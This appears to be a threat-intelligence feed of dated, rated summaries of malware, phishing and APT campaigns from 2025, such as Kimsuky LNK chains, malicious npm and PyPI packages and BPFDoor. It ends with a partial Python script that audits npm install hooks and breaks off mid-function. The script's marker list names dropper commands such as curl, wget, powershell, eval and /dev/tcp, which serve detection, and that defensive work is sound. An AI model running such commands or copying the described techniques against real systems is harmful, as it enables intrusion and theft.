Researchers at ASEC have identified a recent malware campaign distributing malicious LNK files disguised as official notices (e.g., tax bills, sex offender information) to target Korean users for information theft. Upon execution, the LNK file downloads and runs an HTA file, which extracts and executes embedded PowerShell scripts. These scripts perform extensive data collection, targeting browser data (including Naver Whale), cryptocurrency wallets, public certificates (GPKI/NPKI), email files, recent document paths, and implement keylogging and clipboard capturing capabilities. Persistence is established via the Run registry key, and stolen data is compressed and exfiltrated to attacker-controlled servers.
Source: https://asec.ahnlab.com/en/87620/
2025-04-27
Where_Evasion_Drives_Phishing_Forward
LOW
Intel Source:
Group-IB
Intel Name:
Where_Evasion_Drives_Phishing_Forward
Date of Scan:
2025-04-27
Impact:
LOW
Summary:
Group-IB researchers have uncovered an ongoing, sophisticated SMS phishing (smishing) campaign impersonating a major toll road service provider, primarily targeting users in French-speaking Canada since late 2023. Cybercriminals distribute localized SMS messages, often leveraging misconfigured gateways or A2P platforms, urging victims to pay outstanding fees via links that lead to highly convincing fraudulent websites. These sites are designed to harvest both personal identifiable information (PII) and payment card details. The campaign employs advanced evasion techniques, including multi-layered URL redirection through legitimate services like Google AMP, and incorporates third-party JavaScript libraries such as FingerprintJS for browser fingerprinting to block analysis tools and restrict access only to targeted victims, and Cleave.js for real-time input validation.
Source: https://www.group-ib.com/blog/toll-of-deception/
2025-04-27
Kimsuky_Deploys_PebbleDash_via_LNK
MEDIUM
Intel Source:
ASEC
Intel Name:
Kimsuky_Deploys_PebbleDash_via_LNK
Date of Scan:
2025-04-27
Impact:
MEDIUM
Summary:
ASEC researchers have observed recent campaigns by the Kimsuky group distributing the PebbleDash backdoor, previously associated with Lazarus but now increasingly deployed by Kimsuky against individuals. Observed in March 2025, the attack initiates via spear-phishing emails containing malicious LNK files disguised with double extensions. Executing the LNK triggers a JavaScript file, which launches PowerShell scripts to establish persistence (task scheduler, registry keys) and communicate with C2 infrastructure (Dropbox, TCP sockets). Through this C2, Kimsuky deploys additional tools, including PebbleDash and AsyncRAT for remote control, UAC bypass malware (leveraging the AppInfo ALPC technique from UACMe), and a patched version of termsrv.dll to disable RDP license authentication, allowing unfettered RDP access.
Source: https://asec.ahnlab.com/en/87621/
2025-04-26
Billbug_Targeting_SouthAsian_Countries
MEDIUM
Intel Source:
Symantec
Intel Name:
Billbug_Targeting_SouthAsian_Countries
Date of Scan:
2025-04-26
Impact:
MEDIUM
Summary:
Researchers from Symantec have uncovered a campaign run by a Chinese espionage group known as Billbug, also referred to as Lotus Blossom, Lotus Panda or Bronze Elgin. This group emerged in 2009 and is targeting organisations such as a government ministry, an air traffic control agency, a telecom operator and a construction company within one country, as well as a news agency and an air freight company in neighbouring nations. The attackers abuse legitimate software from Trend Micro and Bitdefender to execute their malware through DLL sideloading. Additionally, they leverage the known Sagerunex backdoor and the Zrok tool for remote access, and deploy malware such as ChromeKatz and CredentialKatz to steal passwords and cookies from Google Chrome.
Source: https://www.security.com/threat-intelligence/billbug-china-espionage
2025-04-26
Lazarus_Exploits_SK_Software
LOW
Intel Source:
Securelist
Intel Name:
Lazarus_Exploits_SK_Software
Date of Scan:
2025-04-26
Impact:
LOW
Summary:
Researchers from Securelist have discovered a targeted effort by the Lazarus group called "Operation SyncHole," which impacted at least six South Korean firms in the software, IT, finance, semiconductor, and telecom industries. The group combined watering hole attacks with the exploitation of vulnerabilities in local software, such as Cross EX and Innorix Agent.
Source: https://securelist.com/operation-synchole-watering-hole-attacks-by-lazarus/116326/
2025-04-26
DslogdRAT_Deployed_via_Ivanti_Exploit
LOW
Intel Source:
JPCERT
Intel Name:
DslogdRAT_Deployed_via_Ivanti_Exploit
Date of Scan:
2025-04-26
Impact:
LOW
Summary:
Researchers at JPCERT have identified the installation of DslogdRAT malware and a Perl-based web shell on Ivanti Connect Secure devices in December 2024, leveraging a zero-day vulnerability (CVE-2025-0282) in attacks against Japanese enterprises. The web shell, triggered by a certain cookie value, allowed attackers to run arbitrary commands, which were most likely used to deploy DslogdRAT. This malware employs a multi-process architecture, interacting with its C2 server and carrying out tasks such as file transfer, shell execution, and proxying using encoded socket communications.
Source: https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html
2025-04-26
North_Korea_Russia_Cybercrime_Nexus
MEDIUM
Intel Source:
Trend Micro
Intel Name:
North_Korea_Russia_Cybercrime_Nexus
Date of Scan:
2025-04-26
Impact:
MEDIUM
Summary:
Researchers at Trend Micro have identified that North Korea's cybercrime operations, particularly those associated with the Void Dokkaebi intrusion suite, rely heavily on Russian infrastructure. They discovered various Russian IP address ranges, which are often hidden by VPNs, proxies, and VPS servers, and are regularly utilized by DPRK-aligned actors to execute cyber activities such as crypto wallet brute-forcing, fraudulent job scams, and command-and-control arrangements for Beavertail malware.
Source: https://www.trendmicro.com/en_us/research/25/d/russian-infrastructure-north-korean-cybercrime.html
2025-04-25
Emerging_Phishing_Techniques_and_Attack_Vectors
MEDIUM
Intel Source:
Intezer
Intel Name:
Emerging_Phishing_Techniques_and_Attack_Vectors
Date of Scan:
2025-04-25
Impact:
MEDIUM
Summary:
Intezer researchers have identified several emerging phishing techniques observed in 2025 that successfully bypass traditional email security defenses. Threat actors are increasingly using unconventional methods, including embedding obfuscated, Base64-encoded JavaScript within SVG file attachments, hiding malicious URLs in PDF annotation metadata (invisible in the main text layer), leveraging read-only OneDrive links where malicious URLs are dynamically loaded via JavaScript at runtime, and nesting malicious MHT files containing QR codes within OpenXML (.docx) documents.
Source: https://intezer.com/blog/emerging-phishing-techniques-new-threats-and-attack-vectors/
2025-04-25
LAGTOY_Backdoor_Enables_Ransomware
LOW
Intel Source:
Cisco Talos
Intel Name:
LAGTOY_Backdoor_Enables_Ransomware
Date of Scan:
2025-04-25
Impact:
LOW
Summary:
Researchers at Cisco Talos have found a financially motivated Initial Access Broker (IAB) known as "ToyMaker," who collaborates with double extortion gangs. Talos discovered ToyMaker using internet-exposed vulnerabilities to deliver a custom backdoor known as "LAGTOY," which facilitated credential theft, reverse shell creation, and command execution on infected endpoints in a 2023 investigation of a critical infrastructure company.
Source: https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/
2025-04-25
Malware_Campaign_Potentially_Linked_to_Konni_Group
MEDIUM
Intel Source:
Rixed Labs
Intel Name:
Malware_Campaign_Potentially_Linked_to_Konni_Group
Date of Scan:
2025-04-25
Impact:
MEDIUM
Summary:
An active multi-stage malware campaign, exhibiting strong similarities to the North Korean-linked Konni APT group, was recently analyzed after being distributed via a ZIP archive containing a malicious LNK file. First seen in April 2025, the campaign uses social engineering, disguising the initial LNK file with a Korean filename ("Proposal") and PDF icon to target Korean-speaking users. Execution triggers a complex chain involving obfuscated PowerShell, VBScript, and multiple batch files, which extract payloads hidden within the LNK, establish persistence via the registry, collect directory listings and system information, and ultimately exfiltrate data using RC4-like encryption over HTTPS POST requests.
Source: https://muff-in.github.io/blog/Malware-Campaign-Potentially-Linked-to-DPRK-Konni-Group/
2025-04-24
MSHTA_2FA_Bypass_on_the_Rise
LOW
Intel Source:
ReliaQuest
Intel Name:
MSHTA_2FA_Bypass_on_the_Rise
Date of Scan:
2025-04-24
Impact:
LOW
Summary:
ReliaQuest researchers have discovered an increase in financially driven cyberattacks between December 2024 and February 2025, including a large increase in VPN brute-forcing efforts, defense evasion via MSHTA exploitation, and internal phishing for lateral movement. Initial access attacks through VPNs, RDP, and VDI grew by 21.3%, with many leveraging weak or compromised credentials.
Source: https://www.reliaquest.com/blog/threat-spotlight-cyber-attacker-techniques-dec-2024-to-feb-2025/
2025-04-24
FOG_Ransomware_Linked_to_DOGE
LOW
Intel Source:
Trend Micro
Intel Name:
FOG_Ransomware_Linked_to_DOGE
Date of Scan:
2025-04-24
Impact:
LOW
Summary:
Researchers at Trend Micro have identified that the FOG ransomware is actively circulated by attackers purporting to be affiliated with the Department of Government Efficiency. The threat actors are using phishing emails with ZIP files named "Pay Adjustment.zip," which include malicious LNK files that start the ransomware infection. Nine such samples, uploaded to VirusTotal between March 27 and April 2, exhibited characteristics of the FOG ransomware strain, including binaries with a ".flocked" extension and ransom letters directing victims to spread the malware further.
Source: https://www.trendmicro.com/en_us/research/25/d/fog-ransomware-concealed-within-binary-loaders-linking-themselve.html
2025-04-24
Phishing_via_Ad_Redirects
LOW
Intel Source:
ISC.SANS
Intel Name:
Phishing_via_Ad_Redirects
Date of Scan:
2025-04-24
Impact:
LOW
Summary:
Researchers from ISC SANS have discovered that obviously fraudulent advertising URLs continue to thrive in 2025, revealing ongoing flaws in ad platform security. The Internet Storm Center received a recent phishing email that redirected victims through legitimate ad infrastructure to a well-known credential harvesting page located on a Dynamic DNS service. Despite obvious signs of fraudulent activity and many sightings of the same phishing effort over a week, the redirect remained active and unblocked.
Source: https://isc.sans.edu/diary/Its+2025+so+why+are+obviously+malicious+advertising+URLs+still+going+strong/31880/
2025-04-23
MS_SQL_Attacks_Using_Ammyy_Admin
LOW
Intel Source:
ASEC
Intel Name:
MS_SQL_Attacks_Using_Ammyy_Admin
Date of Scan:
2025-04-23
Impact:
LOW
Summary:
Researchers at ASEC have identified attacks targeting poorly managed, publicly accessible MS-SQL servers to install the legitimate remote control tool, Ammyy Admin, for malicious use. Threat actors gain initial access, likely exploiting weak credentials, and execute reconnaissance commands before using wget to download Ammyy Admin (v3.10, an old version with known exploitation methods) alongside the PetitPotato privilege escalation tool. The attackers utilize PetitPotato to create a new user account and enable Remote Desktop Protocol (RDP) access, supplementing the remote control capability provided by Ammyy Admin.
Source: https://asec.ahnlab.com/en/87606/
2025-04-23
Malicious_PyPI_Package_Targets_MEXC
LOW
Intel Source:
JFrog
Intel Name:
Malicious_PyPI_Package_Targets_MEXC
Date of Scan:
2025-04-23
Impact:
LOW
Summary:
Researchers at JFrog have identified ccxt-mexc-futures, a malicious Python package on PyPI that mimics the legitimate and widely used CCXT library in order to steal cryptocurrency trading credentials. The package claims to offer functionality for MEXC futures trading, but actually hijacks API calls relating to order submission and cancellation and redirects them to a malicious server. This redirection allows attackers to harvest API keys and secrets, potentially compromising user accounts on the MEXC exchange.
Source: https://jfrog.com/blog/malicious-pypi-package-hijacks-mexc-orders-steals-crypto-tokens/
2025-04-23
Vidar_Stealer_Abuse_BFInfo_and_Gaming_Platforms
LOW
Intel Source:
G-Data
Intel Name:
Vidar_Stealer_Abuse_BFInfo_and_Gaming_Platforms
Date of Scan:
2025-04-23
Impact:
LOW
Summary:
Researchers from G-Data have observed that Vidar Stealer is being distributed through gaming platforms and the Microsoft tool BGInfo. Vidar Stealer is a malware that first emerged in 2018 and is known for stealing sensitive information like browser cookies, saved passwords, and financial data. It operates as MaaS and is distributed via phishing emails and malvertising. Researchers identified an incident where a Steam game called PirateFi contained Vidar Stealer that compromised users' systems upon installation. In another incident, attackers leveraged an infected version of BGInfo whose code had been modified to deploy malware when opened.
Source: https://www.gdatasoftware.com/blog/2025/04/38169-vidar-stealer
2025-04-23
Mastercard_Back_in_Phishing_List
LOW
Intel Source:
Checkpoint
Intel Name:
Mastercard_Back_in_Phishing_List
Date of Scan:
2025-04-23
Impact:
LOW
Summary:
Checkpoint researchers have discovered that phishing attempts in the first quarter of 2025 continue to primarily abuse trusted brand names, with Microsoft remaining the top targeted brand, accounting for 36% of all brand phishing activities. Google and Apple come in second and third place, with 12% and 8%, respectively. Notably, Mastercard has made a comeback to the list of top targeted brands for the first time since Q3 2023, now ranked fifth. In February, a massive phishing campaign targeting Mastercard customers appeared, especially affecting Japanese users via bogus websites that mimicked the official Mastercard portal in order to steal credit card information.
Source: https://blog.checkpoint.com/research/microsoft-dominates-as-top-target-for-imitation-mastercard-makes-a-comeback/
2025-04-22
Amazon_Gift_Card_Email_Hooks_Microsoft_Credentials
LOW
Intel Source:
Cofense
Intel Name:
Amazon_Gift_Card_Email_Hooks_Microsoft_Credentials
Date of Scan:
2025-04-22
Impact:
LOW
Summary:
Researchers at Cofense have identified a phishing campaign that deceives users into revealing their Microsoft login credentials by offering a $200 Amazon e-gift card reward from their employer. The attackers send a phishing email that appears to be a reward for excellent job performance from Reward Gateway. When victims click on the gift card link, they are taken to a fraudulent gift card page where they are asked to enter their email address, which then redirects them to a deceptive Microsoft page where the attackers attempt to steal their credentials.
Source: https://cofense.com/blog/amazon-gift-card-email-hooks-microsoft-credentials
2025-04-22
Malicious_PDF_Converter_Campaign
LOW
Intel Source:
cloudsek
Intel Name:
Malicious_PDF_Converter_Campaign
Date of Scan:
2025-04-22
Impact:
LOW
Summary:
Researchers at CloudSEK have found a sophisticated malware operation that used a bogus PDF to DOCX converter platform. Following an FBI alert in March 2025, the investigation discovered that attackers impersonated a reputable file converting service to deceive users. Victims were tricked into running a PowerShell command, which resulted in the deployment of Arechclient2, an information stealer linked to the SectopRAT family.
Source: https://www.cloudsek.com/blog/byte-bandits-how-fake-pdf-converters-are-stealing-more-than-just-your-documents
2025-04-21
Multi_Layered_Malware_Delivery_Chain
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Multi_Layered_Malware_Delivery_Chain
Date of Scan:
2025-04-21
Impact:
MEDIUM
Summary:
Researchers from Palo Alto Networks have discovered a complex phishing campaign that uses a multi-layered attack chain to distribute malware such as Agent Tesla versions, Remcos RAT, and XLoader. The campaign, which was first discovered in December 2024, includes fraudulent emails posing as order release requests, with malicious archives containing JavaScript Encoded files.
Source: https://unit42.paloaltonetworks.com/phishing-campaign-with-complex-attack-chain/
2025-04-21
IronHusky_Revives_MysterySnail_RAT
LOW
Intel Source:
Securelist
Intel Name:
IronHusky_Revives_MysterySnail_RAT
Date of Scan:
2025-04-21
Impact:
LOW
Summary:
Securelist researchers have identified that the Chinese-speaking threat actor IronHusky, active since at least 2017, has deployed new versions of its MysterySnail RAT against government organizations in Russia and Mongolia, regions the actor has previously targeted. This activity marks the first public reporting on the implant since its initial discovery in 2021, although analysis suggests it remained in active use undetected. Delivery occurs via malicious MMC scripts disguised as documents, which retrieve payloads and leverage DLL sideloading against legitimate executables like CiscoCollabHost.exe. An intermediary backdoor utilizes the open-source piping-server for C2 and employs anti-analysis techniques by storing API information in an external, encrypted file. This backdoor then deploys the final MysterySnail RAT, a modular implant using RC4/XOR encryption and DLL hollowing, which communicates over HTTP for extensive system control, including file management, command execution, and process manipulation.
Source: https://securelist.com/mysterysnail-new-version/116226/
2025-04-21
TROX_Stealer_Malware_Campaign
LOW
Intel Source:
Sublime
Intel Name:
TROX_Stealer_Malware_Campaign
Date of Scan:
2025-04-21
Impact:
LOW
Summary:
Sublime researchers have discovered a new Malware-as-a-Service (MaaS) campaign centered on a previously unknown information stealer known as TROX Stealer. TROX, discovered in December 2024, is intended to use urgency-based phishing lures, particularly those involving legal or debt-related implications, to deceive users into breaching security standards. The malware steals sensitive data from Discord and Telegram, including browser credentials, credit card information, cryptocurrency wallets, and session files.
Source: https://sublime.security/blog/trox-stealer-a-deep-dive-into-a-new-malware-as-a-service-maas-attack-campaign/
2025-04-20
Slow_Pisces_Targets_Developers_With_Coding_Challenges
LOW
Intel Source:
Palo Alto
Intel Name:
Slow_Pisces_Targets_Developers_With_Coding_Challenges
Date of Scan:
2025-04-20
Impact:
LOW
Summary:
Researchers from Palo Alto uncovered a campaign conducted by a North Korean threat actor called Slow Pisces, also known as Jade Sleet, TraderTraitor or PUKCHONG, targeting large organizations in the cryptocurrency sector. In this campaign, the group impersonates company recruiters to offer fake job opportunities to developers working in crypto. The group sends them a PDF which includes job details along with a coding challenge. This coding challenge also includes a GitHub repository link containing a project related to stock prices, sports stats, weather, or crypto prices. Once the developer runs the project, it downloads and executes malware named RN Loader and RN Stealer, which are used to steal sensitive information and gain unauthorized access.
Source: https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/
2025-04-20
The_Rising_of_Online_Investment_Scams
LOW
Intel Source:
Cyfirma
Intel Name:
The_Rising_of_Online_Investment_Scams
Date of Scan:
2025-04-20
Impact:
LOW
Summary:
Cyfirma researchers have observed the rise of online investment scams that exploit digital finance, stock trading and cryptocurrencies. These scams are often disguised as money-doubling offers, fake investment schemes, fraudulent trading apps and Telegram-based schemes, which always lure individuals with promises of guaranteed returns in a short time. The scammers create fake companies, develop counterfeit mobile apps and run social media and messaging campaigns to entice people into depositing money. Once money is invested, victims are unable to recover it. Researchers also identified that scammers exploit UPI payment systems for fund transfers and compromise vulnerable Indian government and educational websites to promote their scams.
Source: https://www.cyfirma.com/research/scamonomics-the-dark-side-of-stock-crypto-investments-in-india/
2025-04-20
IAB_Activity_Behind_RDP_Attacks
LOW
Intel Source:
Huntress
Intel Name:
IAB_Activity_Behind_RDP_Attacks
Date of Scan:
2025-04-20
Impact:
LOW
Summary:
Researchers from Huntress have discovered that what looked to be a regular brute force attack against an exposed Remote Desktop Protocol (RDP) service was actually part of a larger and more complicated effort, most likely linked to ransomware initial access brokers. Their investigation began when their SOC identified domain enumeration activity, which led to the discovery of a successful brute force attack against a single user account.
Source: https://www.huntress.com/blog/brute-force-or-something-more-ransomware-initial-access-brokers-exposed
2025-04-19
Malicious_NPM_Packages_Hijack_Crypto_Wallet
LOW
Intel Source:
Reversinglabs
Intel Name:
Malicious_NPM_Packages_Hijack_Crypto_Wallet
Date of Scan:
2025-04-19
Impact:
LOW
Summary:
ReversingLabs researchers have uncovered a campaign where threat actors are hijacking open-source software packages to target cryptocurrency users. They are uploading legitimate-looking packages that apply malicious code to already installed software instead of modifying that software directly. The attackers leverage a fake npm package called pdf-to-office that claims to convert PDF files to MS Office formats but actually searches for crypto wallet apps like Atomic Wallet and Exodus and secretly changes some of their files. This allows the attacker to change the wallet address during a transaction and redirect the funds to their own wallet.
Source: https://www.reversinglabs.com/blog/atomic-and-exodus-crypto-wallets-targeted-in-malicious-npm-campaign
2025-04-18
Malspam_Exploits_NTLM_Vulnerability
LOW
Intel Source:
Checkpoint
Intel Name:
Malspam_Exploits_NTLM_Vulnerability
Date of Scan:
2025-04-18
Impact:
LOW
Summary:
Check Point researchers have discovered active exploitation of CVE-2025-24054, a Windows vulnerability that permits NTLM hash disclosure through spoofing with maliciously crafted .library-ms files. Despite Microsoft issuing a patch on March 11, 2025, threat actors began exploiting this flaw just days later, conducting malspam campaigns against institutions in Poland and Romania.
Source: https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
2025-04-18
XorDDoS_Evolves_in_Global_Linux_Attacks
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
XorDDoS_Evolves_in_Global_Linux_Attacks
Date of Scan:
2025-04-18
Impact:
MEDIUM
Summary:
Cisco Talos researchers have tracked ongoing global activity linked to the XorDDoS malware from November 2023 through February 2025, primarily targeting Linux machines, including Docker servers, to build distributed denial-of-service (DDoS) botnets. Operators, assessed with high confidence by Talos as Chinese-speaking based on tool artifacts, leverage SSH brute-force attacks to gain initial access, followed by script execution to install the malware and establish persistence via init and cron jobs. Analysis revealed a new "VIP version" of the XorDDoS sub-controller and a distinct central controller, tools likely developed as a commercial suite, enabling actors to manage multiple sub-controllers and orchestrate more sophisticated, widespread attacks.
Source: https://blog.talosintelligence.com/unmasking-the-new-xorddos-controller-and-infrastructure/
2025-04-18
APT29_Targets_EU_Diplomats_Again
MEDIUM
+
Intel Source:
Check Point
Intel Name:
APT29_Targets_EU_Diplomats_Again
Date of Scan:
2025-04-18
Impact:
MEDIUM
Summary:
Check Point researchers have identified a renewed phishing campaign by APT29, a Russia-linked threat group that targets diplomatic entities across Europe. The campaign, which began in January 2025, impersonates a major European Ministry of Foreign Affairs and sends fake invitations to wine-tasting events. The emails contain malicious links that deliver a new initial-stage loader called GRAPELOADER, which handles fingerprinting, persistence, and payload delivery.
Source: https://research.checkpoint.com/2025/apt29-phishing-campaign/
2025-04-17
Lazarus_Linked_Malware_Targets_Windows
MEDIUM
+
Intel Source:
Dion Alexander (Medium)
Intel Name:
Lazarus_Linked_Malware_Targets_Windows
Date of Scan:
2025-04-17
Impact:
MEDIUM
Summary:
Dion Alexander has analysed a malware sample exhibiting APT characteristics strongly associated with the Lazarus Group (APT38), a North Korean state-sponsored actor known for financially motivated cybercrime, espionage, and disruptive attacks. The malware, targeting Windows systems, employs multiple evasion and persistence techniques, including packing or obfuscation, process injection, and registry modification for startup execution. Dynamic analysis revealed attempts to establish command and control (C2) communication via HTTP POST requests to a suspicious domain hosted in South Korea, although data exfiltration was not confirmed. Key behaviours align with established Lazarus TTPs, such as use of native Windows APIs, command shell execution, and potentially modifying services or timestomping for defense evasion. While this sample targets Windows, Lazarus' known expansion to Linux and macOS broadens the potential victim pool.
Source: https://medium.com/@InfoSecDion/unpacking-apt38-static-and-dynamic-analysis-of-lazarus-group-malware-d2828e0fd6f0
2025-04-16
Global_Rise_of_Akira_Ransomware
MEDIUM
+
Intel Source:
Dark Atlas
Intel Name:
Global_Rise_of_Akira_Ransomware
Date of Scan:
2025-04-16
Impact:
MEDIUM
Summary:
Researchers from Dark Atlas report that the Akira ransomware group, operating since at least March 2023, has rapidly grown into a substantial threat, hitting over 250 organizations and collecting approximately $42 million in ransom payments. Akira uses a double-extortion model that combines data encryption with exfiltration, threatening to publish stolen information if victims fail to pay. Initial access is usually obtained through compromised VPN credentials and vulnerabilities in Cisco products, followed by lateral movement and data exfiltration using tools such as AnyDesk, RClone, and WinSCP.
Source: https://darkatlas.io/blog/akira-ransomware-road-to-glory
2025-04-16
BRICKSTORM_Backdoor_Hits_Windows
MEDIUM
+
Intel Source:
NVISO
Intel Name:
BRICKSTORM_Backdoor_Hits_Windows
Date of Scan:
2025-04-16
Impact:
MEDIUM
Summary:
NVISO researchers have analyzed BRICKSTORM, a persistent espionage backdoor attributed to the China-nexus cluster UNC5221, now identified targeting Windows environments in addition to its previously known Linux presence. Used in long-running campaigns since at least 2022, BRICKSTORM facilitates intelligence gathering against European industries relevant to Chinese strategic interests, likely focusing on intellectual property and trade secret theft. The backdoor uses sophisticated command and control techniques, including DNS-over-HTTPS (DoH) for initial C2 resolution and a multi-layered TLS tunneling approach (up to three layers) over WebSockets, leveraging legitimate cloud providers such as Cloudflare and Heroku as first-tier proxies to evade detection.
Source: https://blog.nviso.eu/wp-content/uploads/2025/04/NVISO-BRICKSTORM-Report.pdf
2025-04-16
Advanced_macOS_Spyware_PasivRobber
LOW
+
Intel Source:
Kandji
Intel Name:
Advanced_macOS_Spyware_PasivRobber
Date of Scan:
2025-04-16
Impact:
LOW
Summary:
Kandji researchers, following the discovery of a suspicious file named 'wsus' on VirusTotal on March 13, 2025, uncovered PasivRobber, a sophisticated, multi-component macOS spyware suite. This threat appears specifically designed to target Chinese users, indicated by its focus on data exfiltration from applications popular in China, such as WeChat and QQ, alongside web browsers and email clients. The research suggests a potential link between PasivRobber and Xiamen Meiya Pico Information Co., Ltd., a Chinese company previously identified for developing surveillance and forensic tools. PasivRobber demonstrates advanced capabilities and a deep understanding of macOS internals, employing deceptive naming conventions (e.g., 'goed' mimicking 'geod', '.gz' extension for dylibs), persistence via LaunchDaemons, process injection using tools like 'apse' (similar to insert_dylib), and runtime key extraction from messaging apps using Frida. The suite communicates via RPC and FTP for updates and potential command execution, including remote uninstallation. The inherent stealth, comprehensive data harvesting scope, and sophisticated TTPs signify a high risk of extensive espionage and sensitive data compromise for targeted individuals and potentially organizations employing affected macOS systems.
Source: https://www.kandji.io/blog/pasivrobber
2025-04-16
Exploitation_of_Triofox_Servers
LOW
+
Intel Source:
Huntress
Intel Name:
Exploitation_of_Triofox_Servers
Date of Scan:
2025-04-16
Impact:
LOW
Summary:
Researchers from Huntress have observed active exploitation of CVE-2025-30406, a critical vulnerability affecting Gladinet CentreStack and Triofox servers that has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog. The flaw, rated 9.0 in severity, stems from hardcoded cryptographic keys (the ASP.NET machineKey) shipped in the default web.config; an attacker who knows those keys can forge a validly signed ViewState and achieve remote code execution through ASP.NET ViewState deserialization.
Source: https://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild
2025-04-15
BPFDoor_Targets_Telecom_and_Finance
LOW
+
Intel Source:
Trend Micro
Intel Name:
BPFDoor_Targets_Telecom_and_Finance
Date of Scan:
2025-04-15
Impact:
LOW
Summary:
Trend Micro researchers have found a previously unknown controller tied to the BPFDoor malware employed by the APT group Red Menshen (also known as Earth Bluecrow), which allows attackers to open a reverse shell for further infiltration into affected networks. BPFDoor, a stealthy state-sponsored backdoor that uses Berkeley Packet Filtering (BPF), has been detected targeting the telecommunications, finance, and retail sectors in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt.
Source: https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html
2025-04-15
PyArmor_Obfuscated_Malicious_Python_Scripts
LOW
+
Intel Source:
ISC.SANS
Intel Name:
PyArmor_Obfuscated_Malicious_Python_Scripts
Date of Scan:
2025-04-15
Impact:
LOW
Summary:
Researchers at the SANS Internet Storm Center (ISC) have observed malicious actors using the legitimate PyArmor tool to obfuscate Python-based stealer malware, hindering detection and analysis. This multi-stage attack, reported in April 2025, begins with JavaScript that launches PowerShell to download a zipped Python environment containing the obfuscated payload. The malware is designed to steal credentials and cryptocurrency wallet data and relies on obfuscation to evade static detection. It also appears to use WMI queries for reconnaissance or sandbox evasion.
Source: https://isc.sans.edu/diary/Obfuscated+Malicious+Python+Scripts+with+PyArmor/31840/
2025-04-15
Toll_Road_Smishing_Scam_in_the_US
LOW
+
Intel Source:
Cisco Talos
Intel Name:
Toll_Road_Smishing_Scam_in_the_US
Date of Scan:
2025-04-15
Impact:
LOW
Summary:
Since October 2024, Cisco Talos researchers have tracked a large and ongoing SMS phishing (smishing) campaign aimed at toll road users in numerous US states. Financially motivated threat actors impersonate toll payment systems such as E-ZPass to steal personal and financial information. Victims receive SMS messages claiming a small unpaid toll, prompting them to visit fake domains tailored to their state. These sites deceive users with bogus CAPTCHAs and false bills before pressuring them into entering sensitive information such as credit card numbers.
Source: https://blog.talosintelligence.com/unraveling-the-us-toll-road-smishing-scams/
2025-04-15
ResolverRAT_Malware
LOW
+
Intel Source:
Morphisec
Intel Name:
ResolverRAT_Malware
Date of Scan:
2025-04-15
Impact:
LOW
Summary:
Researchers at Morphisec have identified a new remote access trojan called ResolverRAT that is being used against the healthcare and pharmaceutical sectors. The attackers send phishing emails in local languages, including Hindi, Italian, and Turkish, using fear-inducing themes such as legal trouble or copyright violations to trick users into downloading a malicious file. The malware is loaded through DLL side-loading and runs entirely in memory. It establishes persistence through multiple methods, using both the Windows Registry and the file system, and relies on certificate-based authentication, IP rotation, and certificate pinning to maintain its connection to its C2 servers.
Source: https://www.morphisec.com/blog/new-malware-variant-identified-resolverrat-enters-the-maze/
2025-04-14
GOFFEE_Targets_Russian_Entities
LOW
+
Intel Source:
Securelist
Intel Name:
GOFFEE_Targets_Russian_Entities
Date of Scan:
2025-04-14
Impact:
LOW
Summary:
Securelist researchers have found that the threat actor GOFFEE continues to target Russian entities, namely in the media, telecommunications, construction, government, and energy sectors. Since 2022, GOFFEE has relied on spear-phishing emails, originally employing modified Owowa modules and, by 2024, patched malicious instances of explorer.exe. In the second half of 2024, the group introduced a new PowerShell-based implant known as "PowerModul" and began replacing the PowerTaskel agent with a binary Mythic agent for lateral movement. GOFFEE further expanded its infection chains to include Word documents with malicious VBA macros and RAR archives containing double-extension executables.
Source: https://securelist.com/goffee-apt-new-attacks/116139/
2025-04-14
Sapphire_Werewolf_Targeting_Energy_Sector
HIGH
+
Intel Source:
BI.ZONE
Intel Name:
Sapphire_Werewolf_Targeting_Energy_Sector
Date of Scan:
2025-04-14
Impact:
HIGH
Summary:
BI.ZONE researchers have uncovered that the Sapphire Werewolf threat cluster is actively targeting energy sector organizations using an enhanced version of the open-source Amethyst information stealer. Delivered through phishing emails disguised as HR-related memos containing malicious RAR archives, the stealer is executed by a .NET loader that runs a Base64-encoded payload directly in memory. To avoid sandbox detection, the updated variant adds anti-virtualization checks covering registry keys, WMI, hardware components, and services, and it uses Triple DES to encrypt its configuration data. The attack primarily aims to steal credentials and exfiltrate sensitive data from a range of applications, including web browsers (Chrome, Opera, Yandex), Telegram, FileZilla, SSH clients, remote desktop tools, and VPNs, as well as documents stored on removable media.
Source: https://bi.zone/eng/expertise/blog/kamen-ogranennyy-sapphire-werewolf-ispolzuet-novuyu-versiyu-amethyst-stealer-dlya-atak-na-tek/
2025-04-14
Malicious_NPM_Packages_Targeting_PayPal_Users
LOW
+
Intel Source:
Fortinet
Intel Name:
Malicious_NPM_Packages_Targeting_PayPal_Users
Date of Scan:
2025-04-14
Impact:
LOW
Summary:
Fortinet researchers have uncovered a series of malicious npm packages, published by threat actors known as tommyboy_h1 and tommyboy_h2, that target PayPal users. The packages disguise themselves with names such as oauth2-paypal and buttonfactoryserv-paypal. Once installed, they use a preinstall hook to run malicious scripts that silently collect system information such as usernames, hostnames, and directory paths. The exfiltrated data is obfuscated and sent to a remote server controlled by the attacker.
Source: https://www.fortinet.com/blog/threat-research/malicious-npm-packages-targeting-paypal-users
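The preinstall hook is the whole trick: npm runs preinstall, install and postinstall scripts automatically during `npm install`, so a package gets code execution before any of its modules are imported. The audit below, written for this page as an example and not taken from Fortinet's research, walks a node_modules tree, lists every install-time hook it finds, and marks commands that look like droppers rather than build steps. The package names, the constructed node_modules tree and the 203.0.113.7 address are hypothetical; the heuristic markers are a starting point, not a verdict.

```python
import json
import os
import tempfile

# Lifecycle scripts npm runs on its own during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Substrings that rarely appear in a legitimate build step but are common in
# droppers: network fetches, inline interpreters, decoding of hidden payloads.
SUSPICIOUS_MARKERS = (
    "curl ", "wget ", "node -e", "eval(", "base64", "powershell",
    "child_process", "http://", "https://", "/dev/tcp",
)


def install_scripts(package_json: dict) -> dict:
    """Return only the lifecycle scripts that run at install time."""
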